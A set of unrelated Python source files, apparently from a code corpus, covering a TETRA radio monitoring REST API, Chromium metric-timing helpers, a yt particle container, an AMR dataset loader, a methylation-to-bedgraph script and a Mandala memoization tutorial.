mimetype="application/vnd.google-earth.kml+xml",
headers={"Content-disposition": f"attachment; filename={kml_filename}"}
)
# Return response
return(kml_response)
else:
return({'success': False, 'message': "No data found."})
except Exception as e:
# Return failed
return({'success': False, 'message': f"{e}"})
class subscriber_kml_tetrage(Resource):
'''
GET for generating the live .kml file
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self):
# The .kml file is pre-generated and stored in MongoDB as plain text
kml_file = self.DB['tetra_kml'].find_one({'type' : 'tetrage'})
kml_file = kml_file['data']
# Create response as a file
kml_response = Response(
kml_file,
mimetype="application/vnd.google-earth.kml+xml",
headers={"Content-disposition": "attachment; filename=TetraGE.kml"}
)
# Return response
return(kml_response)
class tetra_replication(Resource):
'''
GET for the tetra replication status
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self,):
# Get the data from MongoDB
result = self.DB['tetra_replication'].find({"type" : 'live'})
try:
result = list(result)[0]
result['replication_date'] = result['datetime'] - datetime.timedelta(seconds=result['Seconds_Behind_Master'])
result['replication_date'] = result['replication_date'].isoformat()
result['datetime'] = result['datetime'].isoformat()
except IndexError:
result = {}
result['replication_date'] = datetime.datetime.now().isoformat()
result['datetime'] = datetime.datetime.now().isoformat()
return(jsonify(json.loads(dumps(result))))
class tetra_replication_history(Resource):
'''
GET the historical replication delay
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self,):
start = datetime.datetime.now()
start = start - datetime.timedelta(hours=24 + self.env.hour_offset)
results = self.DB['tetra_replication'].find(
{
'datetime' : {
'$gte' : start
}
}
).sort("datetime", pymongo.DESCENDING)
delay = 0
response =[]
for result in results:
try:
delay = result['Seconds_Behind_Master']
except KeyError:
pass
timestamp = datetime.datetime.strftime(result['datetime'], '%Y/%m/%d %H:%M:%S')
response.append([timestamp, delay])
return(jsonify(json.loads(dumps(response))))
class tetra_subscriber_changes(Resource):
'''
GET the tetra subscriber change history
Either a specific issi or all
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("ssi")
parser.add_argument("start")
parser.add_argument("end")
args = parser.parse_args()
start = datetime.datetime.strptime(args['start'],'%Y%m%d%H%M%S')
start = start - datetime.timedelta(hours=self.env.hour_offset)
end = datetime.datetime.strptime(args['end'],'%Y%m%d%H%M%S')
end = end - datetime.timedelta(hours=self.env.hour_offset)
if args['ssi']:
query = {
'ssi' : int(args['ssi']),
'timestamp': {
'$gte' : start,
'$lte' : end
}
}
else:
query = {
'timestamp': {
'$gte' : start,
'$lte' : end
}
}
responses = self.DB['tetra_subscriber_changes'].find(
query,
sort = [
(
'timestamp', pymongo.DESCENDING
)
]
)
final_response = []
for response in responses:
timestamp = response['timestamp'] + datetime.timedelta(hours=self.env.hour_offset)
response['date'] = datetime.datetime.strftime(timestamp, '%Y/%m/%d %H:%M:%S')
final_response.append(response)
return(jsonify(json.loads(dumps(final_response))))
class tetra_node_overview(Resource):
'''
Tetra nodes overview
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self):
# Get data
tetra_radio_count = self.DB['tetra_radio_count'].find_one({'node' : 'all'})
tetra_group_calls = self.DB['tetra_call_stats'].find_one({'type' : 'group'})
tetra_individual_calls = self.DB['tetra_call_stats'].find_one({'type' : 'individual'})
tetra_sds_calls = self.DB['tetra_call_stats'].find_one({'type' : 'sds'})
tetra_node_load = self.DB['tetra_node_load'].find_one({'type': 'bar'})
tetra_sub_load = self.DB['tetra_node_subscribers'].find_one({'type': 'bar'})
# Replication
result = self.DB['tetra_replication'].find({"type" : 'live'})
try:
result = list(result)[0]
result['replication_date'] = result['datetime'] - datetime.timedelta(seconds=result['Seconds_Behind_Master'])
result['replication_date'] = result['replication_date'].isoformat()
result['datetime'] = result['datetime'].isoformat()
except IndexError:
result = {}
result['replication_date'] = datetime.datetime.now().isoformat()
result['datetime'] = datetime.datetime.now().isoformat()
response = {
'tetra_radio_count' : tetra_radio_count,
'tetra_group_calls' : tetra_group_calls,
'tetra_individual_calls' : tetra_individual_calls,
'tetra_sds_calls' : tetra_sds_calls,
'tetra_node_load' : tetra_node_load,
'tetra_sub_load' : tetra_sub_load,
'tetra_replication' : result,
}
return(jsonify(json.loads(dumps(response))))
class tetra_calls_group(Resource):
'''
Get tetra group calls in range
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("start")
parser.add_argument("end")
args = parser.parse_args()
results = calls_group.get(args, self.env)
return(jsonify(json.loads(dumps(results))))
class tetra_calls_subscriber(Resource):
'''
Get tetra subscriber calls in range
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("issi")
parser.add_argument("start")
parser.add_argument("end")
args = parser.parse_args()
results = calls_subscriber.get(args, self.env)
return(jsonify(json.loads(dumps(results))))
class tetra_calls_detail(Resource):
'''
Get tetra subscriber calls in range
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("id")
args = parser.parse_args()
results = calls_detail.get(args, self.env)
return(jsonify(json.loads(dumps(results)))) |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper classes that make it easier to instrument code for monitoring."""
from infra_libs.ts_mon.common import metrics
import time
class ScopedIncrementCounter(object):
"""Increment a counter when the wrapped code exits.
The counter will be given a 'status' = 'success' or 'failure' label whose
value will be set to depending on whether the wrapped code threw an exception.
Example:
mycounter = Counter('foo/stuff_done')
with ScopedIncrementCounter(mycounter):
DoStuff()
To set a custom status label and status value:
mycounter = Counter('foo/http_requests')
with ScopedIncrementCounter(mycounter, 'response_code') as sc:
status = MakeHttpRequest()
sc.set_status(status) # This custom status now won't be overwritten if
# the code later raises an exception.
"""
def __init__(self, counter, label='status', success_value='success',
failure_value='failure'):
self.counter = counter
self.label = label
self.success_value = success_value
self.failure_value = failure_value
self.status = None
def set_failure(self):
self.set_status(self.failure_value)
def set_status(self, status):
self.status = status
def __enter__(self):
self.status = None
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.status is None:
if exc_type is None:
self.status = self.success_value
else:
self.status = self.failure_value
self.counter.increment({self.label: self.status})
class ScopedMeasureTime(object):
"""Report durations metric with status when the wrapped code exits.
The metric must be CumulativeDistributionMetric with a field to set status.
The status field will be set to 'success' or 'failure' depending on whether
the wrapped code threw an exception. The status field values can be customized
with constructor kwargs or by calling `set_status`.
A new instance of this class should be constructed each time it is used.
Example:
mymetric = CumulativeDistributionMetric(
'xxx/durations', 'duration of xxx op'
[StringField('status')],
bucketer=ts_mon.GeometricBucketer(10**0.04),
units=ts_mon.MetricsDataUnits.SECONDS)
with ScopedMeasureTime(mymetric):
DoStuff()
To set a custom label and status value:
mymetric = CumulativeDistributionMetric(
'xxx/durations', 'duration of xxx op'
[IntegerField('response_code')],
bucketer=ts_mon.GeometricBucketer(10**0.04),
units=ts_mon.MetricsDataUnits.MILLISECONDS)
with ScopedMeasureTime(mymetric, field='response_code') as sd:
sd.set_status(404) # This custom status now won't be overwritten
# even if exception is raised later.
To annotate the duration with some other fields, use extra_fields_values:
mymetric = CumulativeDistributionMetric(
'xxx/durations', 'duration of xxx op'
[StringField('status'),
StringField('type')],
bucketer=ts_mon.GeometricBucketer(10**0.04),
units=ts_mon.MetricsDataUnits.SECONDS)
with ScopedMeasureTime(mymetric, extra_fields_values={'type': 'normal'}):
DoStuff()
"""
_UNITS_PER_SECOND = {
metrics.MetricsDataUnits.SECONDS: 1e0,
metrics.MetricsDataUnits.MILLISECONDS: 1e3,
metrics.MetricsDataUnits.MICROSECONDS: 1e6,
metrics.MetricsDataUnits.NANOSECONDS: 1e9,
}
def __init__(self, metric, field='status', success_value='success',
failure_value='failure', extra_fields_values=(),
time_fn=time.time):
assert isinstance(metric, metrics.CumulativeDistributionMetric)
assert sum(1 for spec in metric.field_spec if spec.name == field) == 1, (
'typo in field name `%s`?' % field)
assert metric.units in self._UNITS_PER_SECOND, (
'metric\'s units (%s) is not one of %s' %
(metric.units, list(self._UNITS_PER_SECOND.keys())))
self._metric = metric
self._field_values = dict(extra_fields_values)
assert field not in self._field_values
self._field_values[field] = None
self._field = field
self._units_per_second = self._UNITS_PER_SECOND[metric.units]
self._success_value = success_value
self._failure_value = failure_value
self._start_timestamp = None
self._time_fn = time_fn
def set_status(self, status):
assert self._start_timestamp is not None, (
'set_status must be called only inside with statement')
self._field_values[self._field] = status
def set_failure(self):
return self.set_status(self._failure_value)
def __enter__(self):
assert self._start_timestamp is None, ('re-use of ScopedMeasureTime '
'instances detected')
self._start_timestamp = self._time_fn()
return self
def __exit__(self, exc_type, exc_value, traceback):
elapsed_seconds = self._time_fn() - self._start_timestamp
if self._field_values[self._field] is None:
if exc_type is None:
self._field_values[self._field] = self._success_value
else:
self._field_values[self._field] = self._failure_value
self._metric.add(elapsed_seconds * self._units_per_second,
self._field_values)
|
<filename>yt/data_objects/index_subobjects/particle_container.py
import contextlib
from more_itertools import always_iterable
from yt.data_objects.data_containers import YTFieldData
from yt.data_objects.selection_objects.data_selection_objects import (
YTSelectionContainer,
)
from yt.utilities.exceptions import (
YTDataSelectorNotImplemented,
YTNonIndexedDataContainer,
)
def _non_indexed(name):
def _func_non_indexed(self, *args, **kwargs):
raise YTNonIndexedDataContainer(self)
return _func_non_indexed
class ParticleContainer(YTSelectionContainer):
_spatial = False
_type_name = "particle_container"
_skip_add = True
_con_args = ("base_region", "data_files", "overlap_files")
def __init__(self, base_region, data_files, overlap_files=None, domain_id=-1):
if overlap_files is None:
overlap_files = []
self.field_data = YTFieldData()
self.field_parameters = {}
self.data_files = list(always_iterable(data_files))
self.overlap_files = list(always_iterable(overlap_files))
self.ds = self.data_files[0].ds
self._last_mask = None
self._last_selector_id = None
self._current_particle_type = "all"
# self._current_fluid_type = self.ds.default_fluid_type
if hasattr(base_region, "base_selector"):
self.base_selector = base_region.base_selector
self.base_region = base_region.base_region
else:
self.base_region = base_region
self.base_selector = base_region.selector
self._octree = None
self._temp_spatial = False
if isinstance(base_region, ParticleContainer):
self._temp_spatial = base_region._temp_spatial
self._octree = base_region._octree
# To ensure there are not domains if global octree not used
self.domain_id = -1
@property
def selector(self):
raise YTDataSelectorNotImplemented(self.oc_type_name)
def select_particles(self, selector, x, y, z):
mask = selector.select_points(x, y, z)
return mask
@contextlib.contextmanager
def _expand_data_files(self):
old_data_files = self.data_files
old_overlap_files = self.overlap_files
self.data_files = list(set(self.data_files + self.overlap_files))
self.data_files.sort()
self.overlap_files = []
yield self
self.data_files = old_data_files
self.overlap_files = old_overlap_files
def retrieve_ghost_zones(self, ngz, coarse_ghosts=False):
gz_oct = self.octree.retrieve_ghost_zones(ngz, coarse_ghosts=coarse_ghosts)
gz = ParticleContainer(
gz_oct.base_region,
gz_oct.data_files,
overlap_files=gz_oct.overlap_files,
selector_mask=gz_oct.selector_mask,
domain_id=gz_oct.domain_id,
)
gz._octree = gz_oct
return gz
select_blocks = _non_indexed("select_blocks")
deposit = _non_indexed("deposit")
smooth = _non_indexed("smooth")
select_icoords = _non_indexed("select_icoords")
select_fcoords = _non_indexed("select_fcoords")
select_fwidth = _non_indexed("select_fwidth")
select_ires = _non_indexed("select_ires")
select = _non_indexed("select")
count = _non_indexed("count")
count_particles = _non_indexed("count_particles")
|
<filename>dataamr.py
from stog.data.dataset_readers.amr_parsing.io import AMRIO
from extra.utils import LongTensor
from extra.settings import PAD_IDX, PAD, OOV, OOV_IDX, BOS, BOS_IDX, \
EOS, EOS_IDX
from tqdm import tqdm
import logging
logger = logging.getLogger(__file__)
def batch_data(amr_data, batch_size=20):
data_train = []
src_batch = []
trg_batch = []
src_batch_len = 0
trg_batch_len = 0
for src, trg in zip(amr_data.X_train_ints, amr_data.Y_train_ints):
if len(src) > src_batch_len:
src_batch_len = len(src)
if len(trg) > trg_batch_len:
trg_batch_len = len(trg)
src_batch.append(src)
trg_batch.append(trg)
if len(src_batch) == batch_size:
for seq in src_batch:
seq.extend([PAD_IDX] * (src_batch_len - len(seq)))
for seq in trg_batch:
seq.extend([PAD_IDX] * (trg_batch_len - len(seq)))
data_train.append((LongTensor(src_batch), LongTensor(trg_batch)))
src_batch = []
trg_batch = []
src_batch_len = 0
trg_batch_len = 0
data_dev = []
for src, trg in zip(amr_data.X_dev_ints, amr_data.Y_dev_ints):
if len(src) > src_batch_len:
src_batch_len = len(src)
if len(trg) > trg_batch_len:
trg_batch_len = len(trg)
src_batch.append(src)
trg_batch.append(trg)
if len(src_batch) == batch_size:
for seq in src_batch:
seq.extend([PAD_IDX] * (src_batch_len - len(seq)))
for seq in trg_batch:
seq.extend([PAD_IDX] * (trg_batch_len - len(seq)))
data_dev.append((LongTensor(src_batch), LongTensor(trg_batch)))
src_batch = []
trg_batch = []
src_batch_len = 0
trg_batch_len = 0
data_test = []
for src, trg in zip(amr_data.X_test_ints, amr_data.Y_test_ints):
if len(src) > src_batch_len:
src_batch_len = len(src)
if len(trg) > trg_batch_len:
trg_batch_len = len(trg)
src_batch.append(src)
trg_batch.append(trg)
if len(src_batch) == batch_size:
for seq in src_batch:
seq.extend([PAD_IDX] * (src_batch_len - len(seq)))
for seq in trg_batch:
seq.extend([PAD_IDX] * (trg_batch_len - len(seq)))
data_test.append((LongTensor(src_batch), LongTensor(trg_batch)))
src_batch = []
trg_batch = []
src_batch_len = 0
trg_batch_len = 0
print("Training data size: %d" % (len(data_train) * batch_size))
print("Training batch size: %d" % batch_size)
print("Dev data size: %d" % (len(data_dev) * batch_size))
print("Dev batch size: %d" % batch_size)
print("Test data size: %d" % (len(data_test) * batch_size))
print("Test batch size: %d" % batch_size)
return data_train, data_dev, data_test
class AMRData():
def __init__(self, train_file, dev_file, test_file, silver,
input_format="raw", use_silver_data=False, small=False):
# Include atributes of each node to the linearized version of the graph
self.use_silver_data = use_silver_data
self.input_format = input_format
self.small = small
self.train_file = train_file
self.X_train = list()
self.Y_train = list()
self.Y_train_tok = list()
self.X_train_simple = list()
self.X_train_simple_attributes = list()
self.X_train_simple_only_nodes = list()
self.X_train_concepts = list()
self.X_train_ints = list()
self.X_train_raw = list()
self.Y_train_ints = list()
self.amr_train = None
self.silver_train_file = silver
self.X_silver_train = list()
self.Y_silver_train = list()
self.Y_silver_train_tok = list()
self.X_silver_train_simple = list()
self.X_silver_train_simple_attributes = list()
self.X_silver_train_simple_only_nodes = list()
self.X_silver_train_concepts = list()
self.X_silver_train_ints = list()
self.X_silver_train_raw = list()
self.Y_silver_train_ints = list()
self.amr_silver_train = None
self.dev_file = dev_file
self.X_dev = list()
self.Y_dev = list()
self.Y_dev_tok = list()
self.X_dev_simple = list()
self.X_dev_simple_attributes = list()
self.X_dev_simple_only_nodes = list()
self.X_dev_concepts = list()
self.X_dev_ints = list()
self.X_dev_raw = list()
self.Y_dev_ints = list()
self.test_file = test_file
self.X_test = list()
self.Y_test = list()
self.Y_test_tok = list()
self.X_test_simple = list()
self.X_test_simple_attributes = list()
self.X_test_simple_only_nodes = list()
self.X_test_ints = list()
self.X_test_raw = list()
self.Y_test_ints = list()
self.edges = list()
self.edges_w_attributes = list()
self.lin_to_int = {
PAD: PAD_IDX,
BOS: BOS_IDX,
EOS: EOS_IDX,
OOV: OOV_IDX}
self.int_to_lin = {
PAD_IDX: PAD,
BOS_IDX: BOS,
EOS_IDX: EOS,
OOV_IDX: OOV}
self.word_to_int = {
PAD: PAD_IDX,
BOS: BOS_IDX,
EOS: EOS_IDX,
OOV: OOV_IDX}
self.int_to_word = {
PAD_IDX: PAD,
BOS_IDX: BOS,
EOS_IDX: EOS,
OOV_IDX: OOV}
def get_list(self, amr):
if self.input_format == "linearized_simple":
with_attributes = False
else:
with_attributes = True
dfs_list = amr.graph.get_list_node()
out_list = list()
for n1, t, n2 in dfs_list:
try:
out_list += [":"+t, n1.__repr__()]
except BaseException:
return None
# If the nodes has attributes, itter through it and add it to the
# list
if with_attributes:
if len(n1.attributes) > 1:
for attr in n1.attributes[1:]:
if type(attr[1]) != str():
attr_tmp = str(attr[1])
else:
attr_tmp = attr[1]
# Attach to final list
out_list += [":"+attr[0], attr_tmp]
return out_list
# Remove not needed symbols
def simplify(self, step):
if step.startswith(":"):
return step, True
step = step.replace(" ", "")
step = step.replace('"', "")
step = step.replace("_", " ")
if "/" in step:
step = step.split("/")[1]
if step != '-':
step = step.split("-")[0]
return step, False
# Main loading method
def load_data(self):
logger.info("Parsing and linearizing the AMR dataset")
train_amr = AMRIO.read(self.train_file)
for i, amr in tqdm(enumerate(train_amr), desc='Train AMR'):
# Raw version
if self.small and i > 50:
break
raw_amr = []
for amr_line in str(amr.graph).splitlines():
striped_amr = amr_line.strip()
raw_amr.append(striped_amr)
self.X_train_raw.append(" ".join(raw_amr))
linearized_amr = self.get_list(amr)
self.X_train.append(linearized_amr[1:])
self.Y_train.append(amr.sentence)
self.Y_train_tok.append(amr.tokens)
# Vocabulary Create dictionaries and simplify list
simpl = list()
simpl_only_nodes = list()
for step in linearized_amr:
if step not in self.lin_to_int.keys():
self.lin_to_int[step] = len(self.lin_to_int)
self.int_to_lin[len(self.int_to_lin)] = step
# simplyfied AMR version
step, edge = self.simplify(step)
simpl.append(step)
if not step.startswith(":"):
simpl_only_nodes.append(step)
# Identify edges and save them
if edge and step not in self.edges:
self.edges.append(step)
self.X_train_simple.append(simpl)
self.X_train_simple_only_nodes.append(simpl_only_nodes)
sent = amr.sentence.split()
for word in sent:
if word not in self.word_to_int.keys():
self.word_to_int[word] = len(self.word_to_int)
self.int_to_word[len(self.int_to_word)] = word
if self.use_silver_data:
print("Processing silver data from", self.silver_train_file)
ii = 0
silver_train_amr = AMRIO.read(self.silver_train_file)
for i, amr in enumerate(silver_train_amr):
if self.small and i > 50:
break
# Raw version
raw_amr = []
ii += 1
linearized_amr = self.get_list(amr)
if linearized_amr is None:
continue
for amr_line in str(amr.graph).splitlines():
striped_amr = amr_line.strip()
raw_amr.append(striped_amr)
self.X_silver_train_raw.append(" ".join(raw_amr))
self.X_silver_train.append(linearized_amr[1:])
self.Y_silver_train.append(amr.sentence)
self.Y_silver_train_tok.append(amr.tokens)
# Vocabulary Create dictionaries and simplify list
simpl = list()
simpl_only_nodes = list()
for step in linearized_amr:
if step not in self.lin_to_int.keys():
self.lin_to_int[step] = len(self.lin_to_int)
self.int_to_lin[len(self.int_to_lin)] = step
# simplyfied AMR version
step, edge = self.simplify(step)
simpl.append(step)
if not step.startswith(":"):
simpl_only_nodes.append(step)
# Identify edges and save them
if edge and step not in self.edges:
self.edges.append(step)
self.X_silver_train_simple.append(simpl)
self.X_silver_train_simple_only_nodes.append(simpl_only_nodes)
sent = amr.sentence.split()
for word in sent:
if word not in self.word_to_int.keys():
self.word_to_int[word] = len(self.word_to_int)
self.int_to_word[len(self.int_to_word)] = word
print("Silver data with size:", len(self.X_silver_train_raw))
else:
print("No silver data performed")
dev_amr = AMRIO.read(self.dev_file)
for i, amr in tqdm(enumerate(dev_amr), desc='Dev AMR'):
if self.small and i > 50:
break
# Raw input
raw_amr = []
for amr_line in str(amr.graph).splitlines():
striped_amr = amr_line.strip()
raw_amr.append(striped_amr)
self.X_dev_raw.append(" ".join(raw_amr))
linearized_amr = self.get_list(amr)
self.X_dev.append(linearized_amr[1:])
self.Y_dev.append(amr.sentence)
self.Y_dev_tok.append(amr.tokens)
# simplyfied AMR version
simpl = list()
simpl_only_nodes = list()
for step in linearized_amr:
step, edge = self.simplify(step)
simpl.append(step)
if not step.startswith(":"):
simpl_only_nodes.append(step)
if edge and step not in self.edges:
self.edges.append(step)
self.X_dev_simple.append(simpl)
self.X_dev_simple_only_nodes.append(simpl_only_nodes)
test_amr = AMRIO.read(self.test_file)
self.amr_test = test_amr
for i, amr in tqdm(enumerate(test_amr), desc='Test AMR'):
if self.small and i > 50:
break
# Raw version
raw_amr = []
for amr_line in str(amr.graph).splitlines():
striped_amr = amr_line.strip()
raw_amr.append(striped_amr)
self.X_test_raw.append(" ".join(raw_amr))
linearized_amr = self.get_list(amr)
self.X_test.append(linearized_amr[1:])
self.Y_test.append(amr.sentence)
self.Y_test_tok.append(amr.tokens)
# simplyfied AMR version
simpl = list()
simpl_only_nodes = list()
for step in linearized_amr:
step, edge = self.simplify(step)
simpl.append(step)
if not step.startswith(":"):
simpl_only_nodes.append(step)
if edge and step not in self.edges:
self.edges.append(step)
self.X_test_simple.append(simpl)
self.X_test_simple_only_nodes.append(simpl_only_nodes)
def output_data(self, output_src_file, output_trg_file):
print("Write linearized AMRs to file")
F_train_src = open(output_src_file+".train", "w")
F_train_raw_src = open(output_src_file+".amr.train", "w")
F_train_trg = open(output_trg_file+".train", "w")
F_train_tok_trg = open(output_trg_file+".tok.train", "w")
F_dev_src = open(output_src_file+".dev", "w")
F_dev_raw_src = open(output_src_file+".amr.dev", "w")
F_dev_trg = open(output_trg_file+".dev", "w")
F_dev_tok_trg = open(output_trg_file+".tok.dev", "w")
F_test_src = open(output_src_file+".test", "w")
F_test_raw_src = open(output_src_file+".amr.test", "w")
F_test_trg = open(output_trg_file+".test", "w")
F_test_tok_trg = open(output_trg_file+".tok.test", "w")
print(
"TRAIN: src lin:", len(
self.X_train), "src amr", len(
self.X_train_raw), "trg text", len(
self.Y_train_tok), "trg tok", len(
self.Y_train_tok))
for x, x_raw, y, y_tok in zip(
self.X_train, self.X_train_raw, self.Y_train, self.Y_train_tok):
print(" ".join(x), file=F_train_src)
print(y_tok, file=F_train_trg)
print(x_raw, file=F_train_raw_src)
print(y_tok, file=F_train_tok_trg)
print(
"dev: src lin:", len(
self.X_dev), "src amr", len(
self.X_dev_raw), "trg text", len(
self.Y_dev), "trg tok", len(
self.Y_dev_tok))
for x, x_raw, y, y_tok in zip(
self.X_dev, self.X_dev_raw, self.Y_dev, self.Y_dev_tok):
print(" ".join(x), file=F_dev_src)
print(y_tok, file=F_dev_trg)
print(x_raw, file=F_dev_raw_src)
print(y_tok, file=F_dev_tok_trg)
print(
"test: src lin:", len(
self.X_test), "src amr", len(
self.X_test_raw), "trg text", len(
self.Y_test), "trg tok", len(
self.Y_test_tok))
for x, x_raw, y, y_tok in zip(
self.X_test, self.X_test_raw, self.Y_test, self.Y_test_tok):
print(" ".join(x), file=F_test_src)
print(y_tok, file=F_test_trg)
print(x_raw, file=F_test_raw_src)
print(y_tok, file=F_test_tok_trg)
F_train_src.close()
F_train_trg.close()
F_train_raw_src.close()
F_train_tok_trg.close()
F_dev_src.close()
F_dev_trg.close()
F_dev_raw_src.close()
F_dev_tok_trg.close()
F_test_src.close()
F_test_trg.close()
F_test_raw_src.close()
F_test_tok_trg.close()
def to_ints(self):
print("Transform to ints")
pbar = tqdm(total=len(self.X_train)+len(self.X_dev)+len(self.X_test))
for x, y in zip(self.X_train, self.Y_train):
self.X_train_ints.append([self.lin_to_int[x_i]
for x_i in x] + [EOS_IDX])
self.Y_train_ints.append([self.word_to_int[y_i]
for y_i in y.split()] + [EOS_IDX])
pbar.update(1)
for x, y in zip(self.X_dev, self.Y_dev):
x_in = list()
y_in = list()
for x_i in x:
if x_i not in self.lin_to_int.keys():
x_in.append(self.lin_to_int[OOV])
else:
x_in.append(self.lin_to_int[x_i])
for y_i in y:
if y_i not in self.word_to_int.keys():
y_in.append(self.word_to_int[OOV])
else:
y_in.append(self.word_to_int[y_i])
self.Y_dev_ints.append(y_in + [EOS_IDX])
self.X_dev_ints.append(x_in + [EOS_IDX])
pbar.update(1)
for x, y in zip(self.X_test, self.Y_test):
x_in = list()
y_in = list()
for x_i in x:
if x_i not in self.lin_to_int.keys():
x_in.append(self.lin_to_int[OOV])
else:
x_in.append(self.lin_to_int[x_i])
for y_i in y:
if y_i not in self.word_to_int.keys():
y_in.append(self.word_to_int[OOV])
else:
y_in.append(self.word_to_int[y_i])
self.Y_test_ints.append(y_in + [EOS_IDX])
self.X_test_ints.append(x_in + [EOS_IDX])
pbar.update(1)
pbar.close()
|
<reponame>methylgrammarlab/proj_scwgbs
import argparse
import os
import sys
import warnings
import numpy as np
import pandas as pd
from tqdm import tqdm
import time
warnings.simplefilter(action='ignore', category=FutureWarning)
sys.path.append(os.path.dirname(os.getcwd()))
sys.path.append(os.getcwd())
from commons import files_tools
import commons.consts as consts
def parse_input():
parser = argparse.ArgumentParser()
parser.add_argument('--methylation_folder', help='Path to methylation files', required=True)
parser.add_argument('--QC_path', help='Path to QC file', required=True)
parser.add_argument('--output_folder', help='Path of the output folder', required=False,
default=os.path.dirname(sys.argv[0]))
args = parser.parse_args()
return args
def get_patient_df_dict(all_file_paths):
"""
Loads all the methylation DF and returns them as a dictionary
:param all_file_paths: List of all the methylation files
:return: A dictionary were the keys are the patient and the values a dictionary of chromosome and the methylation df
"""
patient_df_dict = {}
for file_path in tqdm(all_file_paths):
patient, chromosome = consts.DATA_FILE_SCWGBS_RE.findall(file_path)[0]
if patient not in patient_df_dict:
patient_df_dict[patient] = {}
df = pd.read_pickle(file_path)
patient_df_dict[patient][chromosome] = df
return patient_df_dict
def get_QC(QC_path):
qc_df = pd.read_csv(QC_path)
qc_dict = {patient: qc_df.loc[qc_df.patient == patient, "X"] for patient in qc_df.patient.unique()}
return qc_dict
def combine_df(df_list):
merged = pd.concat(df_list)
return merged
def save_to_file(patient, all_patient_chr, out_path):
filename = "filtered_cpg_ratios_%s_hg19.bedgraph.gz"
path = os.path.join(out_path, filename % patient)
all_patient_chr.to_csv(path, compression='gzip', sep='\t', index=False)
def create_bed(patients_dict, passed_QC, out_path):
for patient in tqdm(patients_dict):
df_list = create_df_list(patients_dict[patient], passed_QC[patient])
all_patient_chr = combine_df(df_list)
save_to_file(patient, all_patient_chr, out_path)
def create_df_list(patient_dict, passed_QC):
patient_list = []
for chr in patient_dict:
chr_df = patient_dict[chr]
# filter
filtered_df = chr_df.loc[chr_df.index & passed_QC, :]
# transpose
transposed_df = filtered_df.T
# add bed columns
transposed_df.insert(0, 'chr', chr)
transposed_df.insert(1, 'start', transposed_df.index.astype(int))
transposed_df.insert(2, 'end', transposed_df.start + 1)
patient_list.append(transposed_df)
return patient_list
def main():
args = parse_input()
passed_QC = get_QC(args.QC_path)
all_files = files_tools.get_files_to_work(args.methylation_folder, pattern=os.path.join("*", "*.pkl.zip"))
patients_dict = get_patient_df_dict(all_files)
create_bed(patients_dict, passed_QC, args.output_folder)
if __name__ == '__main__':
t0 = time.time()
main()
t1 = time.time()
print("total time:", t1 - t0)
|
<reponame>amakelov/mandala
#!/usr/bin/env python
# coding: utf-8
# # Mandala: self-managing experiments
# ## What is Mandala?
# Mandala enables new, simpler patterns for working with complex and evolving
# computational experiments.
#
# It eliminates low-level code and decisions for how to save, load, query,
# delete and otherwise organize results. To achieve this, it lets computational
# code "manage itself" by organizing and addressing its own data storage.
#
# ```{admonition} Under construction
# :class: warning
# This project is under active development
# ```
#
# ### Features at a glance
# - **concise**: code computations in pure Python (w/ control flow, collections,
# ...) -- results are automatically tracked and queriable
# - **iterate rapidly**: add/edit parameters/logic and rerun code -- past results
# are loaded on demand, and only new computations are executed
# - **pattern-match against Python code**: query across complex, branching
# projects by reusing computational code itself
# ### Quick start
# #### Installation
# ```console
# pip install git+https://github.com/amakelov/mandala
# ```
# #### Recommended introductions
# To build some understanding, check these out:
# - 2-minute introduction: [intro to self-managing code](2mins)
# - 10-minute introduction: [manage a small ML project](10mins)
# #### Minimal working examples
# If you want to jump right into code, below are a few minimal, somewhat
# interesting examples to play with and extend:
# In[1]:
from typing import List
from mandala.all import *
set_logging_level('warning')
# create a storage for results
storage = Storage(in_memory=True) # can also be persistent (on disk)
@op(storage) # memoization decorator
def inc(x) -> int:
return x + 1
@op(storage)
def mean(x:List[int]) -> float:
# you can operate on / return collections of memoized results
return sum(x) / len(x)
with run(storage): # calls inside `run` block are memoized
nums = [inc(i) for i in range(5)]
result = mean(nums) # memoization composes through lists without copying data
print(f'Mean of 5 nums: {result}')
# add logic/parameters directly on top of memoized code without re-doing past work
with run(storage, lazy=True):
nums = [inc(i) for i in range(10)]
result = mean(nums)
# walk over chains of calls without loading intermediate data
# to traverse storage and collect results flexibly
with run(storage, lazy=True):
nums = [inc(i) for i in range(10)]
result = mean(nums)
print(f'Reference to mean of 10 nums: {result}')
storage.attach(result) # load the value in-place
print(f'Loaded mean of 10 nums: {result}')
# pattern-match to memoized compositions of calls
with query(storage) as q:
# this may not make sense unless you read the tutorials
i = Query()
inc_i = inc(i).named('inc_i')
nums = MakeList(containing=inc_i, at_index=0).named('nums')
result = mean(nums).named('result')
df = q.get_table(inc_i, nums, result)
df
# ## Why Mandala?
# ### Advantages
# Compared to other tools for tracking and managing computations, the features that
# most set Mandala apart are the direct and concise patterns in which complex
# Python code can interact with its own storage. This manifests in several ways:
# - **Python code as interface to its own storage**: you just write the code to compute
# what you want to compute (freely using Python's control flow and collections),
# and directly add more parameters and logic to it over time. Mandala takes
# care of the rest:
# - **the organization of storage mirrors the structure of code**, and Mandala
# provides you with the tools to make maximum use of this --
# retracing memoized code with on-demand data loading, and declarative
# code-based pattern-matching.
# - this leads to **simple, intuitive and flexible ways to query and iterate on
# experiments**, even when their logic gets quite complex -- without any data
# organization efforts on your part.
# - it also allows you to **query relationships between any variables in your
# projects**, even when they are separated by many computational steps -- **without
# explicitly annotating these relationships**.
